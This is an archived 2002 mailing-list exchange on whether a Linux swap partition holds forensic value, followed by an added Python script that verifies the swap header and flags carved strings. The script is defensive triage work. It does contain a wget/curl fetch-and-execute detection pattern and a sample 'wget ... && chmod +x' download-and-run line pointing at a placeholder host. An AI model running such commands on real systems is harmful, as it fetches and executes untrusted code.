Hey Rick (and all),

The swap partition is a component of the virtual memory system in Unix and Unix-like systems. When something doesn't "fit" into the actual RAM the computer has, the operating system can page out individual pages of memory it is not using to the hard disk (specifically to the swap partition). If memory is in particularly high demand and a whole process has been deemed idle, that whole process may be swapped out of the RAM and onto the virtual memory (again, the swap partition). Essentially the swap partition is scratch paper for when memory gets tight.

Swap space also has virtually no format, as its state is kept in RAM by the OS. If the computer crashes, all those bits on the swap space become meaningless to the computer because the mappings in memory and the CPU are gone.

So what of all this can you use? Well, most computers do not wipe or protect the swap partition by zeroing pages on it. This means that *if* a file was swapped or paged out of memory and into virtual memory, then it *might* still be there.

In my opinion, swap space is a reasonable route to run down if you are having a hard time with other routes, provided the system is a single-user system and you have an idea of what you are looking for. If the system is multi-user, you may have a hard time linking some arbitrary bits in the swap partition to a particular user. You need to have an idea of what you are looking for because, well, swap partitions are very big for a human to look at. You need some automation that can flag the parts that are interesting.

Hope this helps somewhat! I wish I could tell you how to mount and peek around the swap partition, but I don't know the details of it off the top of my head.

Sam B.

On Wednesday, July 24, 2002, at 02:38 PM, saliskorat_private wrote:

> New to forensics.... particularly in Unix/Linux...
>
> I have imaged the partitions on a problematic Linux box, ending up with,
> among other things, a swap partition. My question is:
>
> Is there any value to mounting and analysing a Linux swap partition? I
> attempted to mount and received an error, stating that the partition
> appeared to be a swap partition - which of course it was.
>
> If there is value in mounting and analysing, is there a particular -t
> parameter for mounting a swap file system? What should I be looking for
> once I get it mounted?
>
> Thanks in advance for any suggestions or advice.
>
> Rick
>
> -----------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Jul 28 2002 - 13:07:56 PDT
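Two things in Sam's reply are worth seeing in code: why mount(8) refuses the image (a Linux swap area has a ten-byte signature and a small header in its first page, but no filesystem), and what "automation that can flag interesting parts" looks like in practice. The script below is an added example written for this archive page; it is not from the thread or from any tool the posters used. The header layout (magic "SWAPSPACE2" in the last ten bytes of page 0; version, last_page, nr_badpages, UUID and label from byte 1024) is the Linux v1 swap format; a 4 KiB page size and little-endian byte order are assumed, as they would be for an x86 host. The sample image is constructed in memory, and the indicator patterns are hypothetical starting points, not a fixed signature set.

```python
"""Triage a raw Linux swap image: confirm the swap signature, then carve
printable strings and flag the ones that look like paged-out secrets or
attacker activity.  Added example; the sample image is constructed inline."""
import re
import struct
from typing import Dict, Iterator, List, Optional, Tuple

PAGE_SIZE = 4096        # assumed: image taken from a 4 KiB-page host
MIN_STRING_LEN = 8      # shorter runs are mostly noise in a swap image

# Linux swap v1: "SWAPSPACE2" fills the last 10 bytes of page 0; the info
# struct (version, last_page, nr_badpages, uuid, label) starts at byte 1024.
SWAP_MAGIC = b"SWAPSPACE2"


def parse_swap_header(image: bytes, page_size: int = PAGE_SIZE) -> Optional[Dict[str, object]]:
    """Return the v1 header fields if `image` is a Linux swap area, else None.
    This signature, and the absence of any filesystem, is what mount(8) sees."""
    if len(image) < page_size or image[page_size - 10:page_size] != SWAP_MAGIC:
        return None
    version, last_page, nr_badpages = struct.unpack_from("<III", image, 1024)  # assumed little-endian
    return {
        "version": version,
        "last_page": last_page,
        "nr_badpages": nr_badpages,
        "uuid": image[1036:1052].hex(),
        "label": image[1052:1068].split(b"\x00", 1)[0].decode("ascii", "replace"),
    }


# Hypothetical triage patterns; tune them to what you expect to find on the box.
INDICATORS = {
    "credential":    re.compile(rb"(?i)pass(word|wd)?\s*[:=]\s*\S"),
    "passwd_entry":  re.compile(rb"^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:"),
    "download_exec": re.compile(rb"\b(wget|curl)\b.*\b(chmod|sh|bash)\b"),
    "private_key":   re.compile(rb"BEGIN [A-Z ]*PRIVATE KEY"),
}


def carve_strings(image: bytes, min_len: int = MIN_STRING_LEN) -> Iterator[Tuple[int, bytes]]:
    """Yield (offset, run) for every printable-ASCII run of at least min_len bytes,
    the same selection strings(1) makes, but keeping the offset for each hit."""
    run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for m in run.finditer(image):
        yield m.start(), m.group()


def flag_interesting(image: bytes, page_size: int = PAGE_SIZE) -> List[Dict[str, object]]:
    """Run every carved string through INDICATORS and report offset and page
    number, so a hit can be located again (e.g. with dd) in the image."""
    hits: List[Dict[str, object]] = []
    for offset, text in carve_strings(image):
        for category, rx in INDICATORS.items():
            if rx.search(text):
                hits.append({"offset": offset, "page": offset // page_size,
                             "category": category, "text": text.decode("ascii")})
    return hits


def build_sample_image(pages: int = 4) -> bytes:
    """Constructed 4-page swap image: a valid header plus a few fragments of
    the kind of memory that gets paged out.  Sample data, not real evidence."""
    buf = bytearray(pages * PAGE_SIZE)
    struct.pack_into("<III", buf, 1024, 1, pages - 1, 0)   # version 1, last_page, no bad pages
    buf[1036:1052] = bytes(range(16))                      # fake UUID
    buf[1052:1060] = b"evidence"                           # volume label
    buf[PAGE_SIZE - 10:PAGE_SIZE] = SWAP_MAGIC
    fragments = {
        1 * PAGE_SIZE + 100: b"root:x:0:0:root:/root:/bin/bash\n",
        2 * PAGE_SIZE + 512: b"wget http://example.invalid/x.sh && chmod +x x.sh\n",
        3 * PAGE_SIZE + 40:  b"Password: s3cr3t\x00",
        3 * PAGE_SIZE + 300: b"-----BEGIN OPENSSH PRIVATE KEY-----\n",
    }
    for off, data in fragments.items():
        buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    img = build_sample_image()
    print("header:", parse_swap_header(img))
    for h in flag_interesting(img):
        print(f"page {h['page']:>4} @0x{h['offset']:08x} {h['category']:<14} {h['text']}")
```

On a real image the carving step is what `strings -t x swap.img` does; the point of keeping the offsets is that a flagged run can be pulled back out with its surrounding page for context. Note that the label "evidence" and the magic itself are carved too but match nothing, which is the filtering Sam is asking for. The offset tells you where a fragment sat in swap, not which process or user put it there, so on a multi-user box a hit still has to be corroborated from elsewhere.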